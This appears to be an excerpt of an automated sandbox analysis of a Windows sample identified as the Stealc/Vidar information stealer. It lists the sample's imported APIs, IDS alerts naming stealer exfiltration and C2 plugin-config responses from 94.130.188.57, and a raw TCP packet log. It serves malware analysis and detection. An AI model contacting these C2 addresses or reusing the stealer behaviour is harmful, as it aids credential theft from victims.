| KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
| USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
| GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
| SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
| ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
| COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
| ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-22T22:47:37.428543+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.4 | 49740 | 94.130.188.57 | 443 | TCP |
| 2024-12-22T22:47:41.986571+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.4 | 49742 | 94.130.188.57 | 443 | TCP |
| 2024-12-22T22:47:41.987210+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 94.130.188.57 | 443 | 192.168.2.4 | 49742 | TCP |
| 2024-12-22T22:47:44.275191+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 94.130.188.57 | 443 | 192.168.2.4 | 49743 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.704925060 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:31.747378111 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186774969 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186839104 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186878920 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186954975 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186954975 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.186990023 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.187026978 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.187047005 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.187144995 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.187818050 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.188891888 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.188916922 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509154081 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509243011 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509336948 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509582043 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.509608030 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.388446093 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.388626099 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.395425081 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.395443916 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.395812035 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.395867109 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.396446943 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:34.443371058 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078500986 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078579903 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078620911 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078707933 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078773022 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.078829050 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.081430912 CET49739443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.081459999 CET4434973994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083281040 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083388090 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083487034 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083664894 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:35.083713055 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.526060104 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.526145935 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.526524067 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.526551962 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.528146029 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:36.528162956 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428637981 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428719997 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428801060 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428837061 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428951979 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.428951979 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.429111004 CET49740443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.429140091 CET4434974094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.430855989 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.430891037 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.430955887 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.431134939 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:37.431145906 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.833894968 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.834052086 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.834368944 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.834377050 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.836051941 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:38.836061001 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714426994 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714504004 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714519978 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714566946 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714572906 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714616060 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714627028 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714664936 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714751005 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714801073 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714843988 CET49741443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.714859009 CET4434974194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716149092 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716237068 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716326952 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716509104 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:39.716537952 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.123958111 CET4434974294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:41.124150038 CET49742443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.144310951 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145270109 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145327091 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145654917 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145710945 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.145793915 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.150809050 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.150820017 CET44349752142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.150880098 CET49752443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.207923889 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.208170891 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.208254099 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.209276915 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.209366083 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.210397959 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.210486889 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.210511923 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.254870892 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.254930019 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.302828074 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.375168085 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.376171112 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.376224041 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.377676964 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.377743959 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.378062963 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.378144979 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.378192902 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.419368029 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.427684069 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.427694082 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.474553108 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.774290085 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.774347067 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.774425983 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.774446011 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.782711983 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.782766104 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.782778025 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.793334007 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.793395042 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.793553114 CET49751443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.793565989 CET44349751142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070167065 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070209980 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070233107 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070255995 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070256948 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070276976 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.070297956 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.077953100 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.078006029 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.078018904 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.090760946 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.090801954 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.090815067 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105036974 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105057001 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105081081 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105094910 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.105132103 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.218988895 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.219362974 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.219418049 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.220273972 CET49754443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.220279932 CET44349754142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.256423950 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.260688066 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.260751963 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.260813951 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.275090933 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.275141001 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.275160074 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.284758091 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.284826994 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.284888029 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.294389963 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.294461012 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.294492960 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.308345079 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.308547974 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.308610916 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.321906090 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.322171926 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.695622921 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.695749044 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.695796013 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.695863962 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.696314096 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.703538895 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.704665899 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.704849958 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.704912901 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.704950094 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.705004930 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.705107927 CET49753443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.705138922 CET44349753142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.137770891 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.137811899 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.138201952 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.138329983 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:52.138359070 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443098068 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443150997 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443211079 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443424940 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.443438053 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.831156015 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.832766056 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.832828045 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.833187103 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.833606005 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.833720922 CET44349761142.250.181.68192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:53.879991055 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.516120911 CET49761443192.168.2.4142.250.181.68
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.600766897 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.600807905 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.604063034 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.604399920 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.604412079 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.844048023 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.844114065 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.844505072 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.844511986 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.846143961 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:54.846148968 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.894669056 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.894731045 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.894737005 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.894773006 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.895452023 CET49764443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:55.895467997 CET4434976494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.002130985 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.002216101 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.002558947 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.002566099 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004131079 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004136086 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004204988 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004216909 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004261017 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004264116 CET4434976694.130.188.57192.168.2.4
